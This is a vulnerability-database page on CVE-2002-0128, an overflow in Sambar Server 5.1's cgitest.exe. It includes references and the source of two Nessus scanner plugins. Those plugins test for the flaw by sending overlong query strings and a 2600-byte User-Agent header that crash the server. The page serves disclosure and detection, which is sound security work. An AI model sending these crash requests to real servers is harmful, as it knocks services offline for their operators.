Vulnerabilities > CVE-2002-0128 - Unspecified vulnerability in Sambar Server 5.1
Attack vector
UNKNOWN Attack complexity
UNKNOWN Privileges required
UNKNOWN Confidentiality impact
UNKNOWN Integrity impact
UNKNOWN Availability impact
UNKNOWN Summary
cgitest.exe in Sambar Server 5.1 before Beta 4 allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long argument.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 1 |
Exploit-Db
| description | Sambar Server 5.1 Sample Script Denial Of Service Vulnerability. CVE-2002-0128. Dos exploit for windows platform |
| id | EDB-ID:21228 |
| last seen | 2016-02-02 |
| modified | 2002-02-06 |
| published | 2002-02-06 |
| reporter | Tamer Sahin |
| source | https://www.exploit-db.com/download/21228/ |
| title | Sambar Server 5.1 - Sample Script Denial of Service Vulnerability |
Nessus
NASL family CGI abuses NASL id SAMBAR_DOS.NASL description It is possible to kill the Sambar web server last seen 2020-06-01 modified 2020-06-02 plugin id 11131 published 2002-09-21 reporter This script is Copyright (C) 2002-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/11131 title Sambar Server Multiple CGI Remote Overflow code # # (C) Tenable Network Security, Inc. # # References: # From: "Tamer Sahin" <[email protected]> # To: [email protected] # Subject: Sambar Webserver v5.1 DoS Vulnerability # Date: Wed, 16 Jan 2002 01:57:17 +0200 # Affiliation: http://www.securityoffice.net # # Vulnerables: # Sambar WebServer v5.1 # NB: this version of Sambar is also vulnerable to a too long HTTP field. # include("compat.inc"); if(description) { script_id(11131); script_version ("1.25"); script_cve_id("CVE-2002-0128"); script_bugtraq_id(3885); script_name(english:"Sambar Server Multiple CGI Remote Overflow"); script_set_attribute(attribute:"synopsis", value: "The remote web server is vulnerable to a denial of service." ); script_set_attribute(attribute:"description", value: "It is possible to kill the Sambar web server 'server.exe' by sending it a long request like: /cgi-win/testcgi.exe?XXXX...X /cgi-win/cgitest.exe?XXXX...X /cgi-win/Pbcgi.exe?XXXXX...X (or maybe in /cgi-bin/) An attacker may use this flaw to cause the server to crash continuously." ); script_set_attribute(attribute:"solution", value: "Upgrade the server to Sambar 51p or delete those CGI." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"plugin_publication_date", value: "2002/09/21"); script_set_attribute(attribute:"vuln_publication_date", value: "2002/01/16"); script_cvs_date("Date: 2018/07/27 18:38:14"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_summary(english:"Crashes Sambar web server"); script_category(ACT_DENIAL); script_copyright("This script is Copyright (C) 2002-2018 Tenable Network Security, Inc."); script_family(english:"CGI abuses"); script_dependencies("find_service1.nasl", "http_version.nasl"); script_require_ports("Services/www", 80); script_require_keys("www/sambar", "Settings/ParanoidReport"); exit(0); } # The script code starts here include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); # The advisories are not clear: is this cgitest.exe or testcgi.exe? # Is it in cgi-bin or cgi-win? dir[0] = ""; # Keep it here or change code below dir[1] = "/cgi-bin/"; dir[2] = "/cgi-win/"; fil[0] = "cgitest.exe"; fil[1] = "testcgi.exe"; fil[2] = "Pbcgi.exe"; port = get_http_port(default:80); banner = get_http_banner(port: port); if (! banner || ! egrep(string: banner, pattern: "^Server:.*SAMBAR")) exit(0); if (http_is_dead(port:port)) exit(0); # TBD: request each URL a few times... function test_port(port, cgi) { local_var r, req, soc; r = http_send_recv3(method: "GET", port: port, item: strcat(cgi, "?", crap(4096))); if (isnull(r)) return 1; return(0); } for (c=0; c<3; c=c+1) { # WARNING! Next loop start at 1, not 0 ! for (d=1; d<3; d=d+1) { if (test_port(port: port, cgi: string(dir[d], fil[c]))) break; } } if (http_is_dead(port:port, retry: 3)) security_warning(port);NASL family CGI abuses NASL id CGITEST.NASL description The remote host is running a vulnerable version of Sambar Server, a web server and web proxy. There is a remote buffer overflow vulnerability in last seen 2020-06-01 modified 2020-06-02 plugin id 10040 published 1999-11-18 reporter This script is Copyright (C) 1999-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/10040 title Sambar Server cgitest.exe Remote Overflow code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(10040); script_version("1.44"); script_cvs_date("Date: 2018/11/15 20:50:16"); script_cve_id("CVE-2002-0128"); script_bugtraq_id(3885); script_name(english:"Sambar Server cgitest.exe Remote Overflow"); script_summary(english:"Checks for the /cgi-bin/cgitest.exe buffer overrun"); script_set_attribute(attribute:"synopsis", value: "The web application installed on the remote host has a buffer overflow vulnerability."); script_set_attribute(attribute:"description", value: "The remote host is running a vulnerable version of Sambar Server, a web server and web proxy. There is a remote buffer overflow vulnerability in 'cgitest.exe'. A remote attacker could use this to crash the web server, or potentially execute arbitrary code."); script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Jan/188"); script_set_attribute(attribute:"solution", value:"Remove the affected file from /cgi-bin."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:W/RC:ND"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2002/01/16"); script_set_attribute(attribute:"plugin_publication_date", value:"1999/11/18"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_DENIAL); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc."); script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl"); script_exclude_keys("Settings/disable_cgi_scanning"); script_require_keys("Settings/ParanoidReport"); script_require_ports("Services/www", 80); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); port = get_http_port(default:80); if (http_is_dead(port: port)) exit(1, "The web server on port "+port+" is dead."); flag = 0; directory = ""; foreach dir (cgi_dirs()) { if (is_cgi_installed3(item:string(dir, "/cgitest.exe"), port:port, exit_on_fail: 1)) { flag = 1; directory = dir; break; } } if(!flag)exit(0, "cgitest.exe was not found on port "+port+"."); data = string(directory, "/cgitest.exe"); user_agent = make_array("User-Agent", crap(2600)); r = http_send_recv3(method:"GET", item:data, port:port, add_headers:user_agent, exit_on_fail: 0); if (isnull(r)) security_hole(port);
References
- http://www.der-keiler.de/Mailing-Lists/securityfocus/bugtraq/2002-02/0083.html
- http://www.der-keiler.de/Mailing-Lists/securityfocus/bugtraq/2002-02/0083.html
- http://www.iss.net/security_center/static/7894.php
- http://www.iss.net/security_center/static/7894.php
- http://www.sambar.com/security.htm
- http://www.sambar.com/security.htm
- http://www.securityfocus.com/archive/1/250545
- http://www.securityfocus.com/archive/1/250545
- http://www.securityfocus.com/bid/3885
- http://www.securityfocus.com/bid/3885